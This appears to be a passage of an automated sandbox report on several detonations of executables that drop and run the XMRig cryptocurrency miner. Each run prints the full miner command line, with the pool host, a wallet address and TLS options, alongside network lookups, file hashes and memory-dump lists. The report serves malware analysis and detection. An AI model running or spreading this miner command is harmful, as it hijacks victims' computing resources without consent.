910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1080-16-0x00000131E7260000-0x00000131E7280000-memory.dmp

memory/1080-17-0x00000131E72B0000-0x00000131E72D0000-memory.dmp

memory/1080-18-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-21-0x00000131E8BA0000-0x00000131E8BC0000-memory.dmp

memory/1080-19-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-20-0x00000131E72D0000-0x00000131E72F0000-memory.dmp

memory/1080-22-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-23-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-25-0x00000131E8BA0000-0x00000131E8BC0000-memory.dmp

memory/1080-24-0x00000131E72D0000-0x00000131E72F0000-memory.dmp

memory/1080-26-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-27-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-28-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-29-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-30-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-31-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-32-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-33-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-34-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-35-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-36-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-37-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-38-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-39-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-40-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-41-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-42-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-43-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-44-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-45-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-46-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-47-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-48-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-49-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-50-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-51-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-52-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-53-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-54-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-55-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-56-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-57-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-58-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-59-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-60-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-61-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-62-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-63-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-64-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-65-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-66-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-67-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-68-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-69-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-70-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-71-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-72-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-73-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-74-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-75-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-76-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-77-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-78-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-79-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-80-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-81-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-82-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-83-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-84-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:59

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.136:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 136.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4696-16-0x0000018C512C0000-0x0000018C512E0000-memory.dmp

memory/4696-17-0x0000018C51300000-0x0000018C51320000-memory.dmp

memory/4696-18-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-21-0x0000018C51320000-0x0000018C51340000-memory.dmp

memory/4696-20-0x0000018C51340000-0x0000018C51360000-memory.dmp

memory/4696-19-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-22-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-23-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-24-0x0000018C51340000-0x0000018C51360000-memory.dmp

memory/4696-25-0x0000018C51320000-0x0000018C51340000-memory.dmp

memory/4696-26-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-27-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-28-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-29-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-30-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-31-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-32-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-33-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-34-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-35-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-36-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-37-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-38-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-39-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-40-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-41-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-42-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-43-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-44-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-45-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-46-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-47-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-48-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-49-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-50-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-51-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-52-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-53-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-54-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-55-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-56-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-57-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-58-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-59-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-60-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-61-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-62-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-63-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-64-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-65-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-66-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-67-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-68-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-69-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-70-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-71-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-72-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-73-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-74-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-75-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-76-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-77-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-78-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-79-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-80-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-81-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-82-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-83-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-84-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:07

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1794s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.185:443 www.bing.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 185.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.185:443 www.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/636-16-0x000001DD0CA30000-0x000001DD0CA50000-memory.dmp

memory/636-17-0x000001DD0CC80000-0x000001DD0CCA0000-memory.dmp

memory/636-18-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-19-0x000001DD0CCC0000-0x000001DD0CCE0000-memory.dmp

memory/636-20-0x000001DD0CCA0000-0x000001DD0CCC0000-memory.dmp

memory/636-21-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-22-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-23-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-24-0x000001DD0CCC0000-0x000001DD0CCE0000-memory.dmp

memory/636-25-0x000001DD0CCA0000-0x000001DD0CCC0000-memory.dmp

memory/636-26-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-27-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-28-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-29-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-30-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-31-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-32-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-33-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-34-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-35-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-36-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-37-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-38-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-39-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-40-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-41-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-42-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-43-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-44-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-45-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-46-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-47-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-48-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-49-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-50-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-51-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-52-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-53-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-54-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-55-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-56-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-57-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-58-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-59-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-60-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-61-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-62-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-63-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-64-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-65-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-66-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-67-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-68-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-69-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-70-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-71-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-72-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-73-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-74-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-75-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-76-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-77-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-78-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-79-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-80-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-81-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-82-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-83-0x00007FF679030000-0x00007FF679B33000-memory.dmp

memory/636-84-0x00007FF679030000-0x00007FF679B33000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:51

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
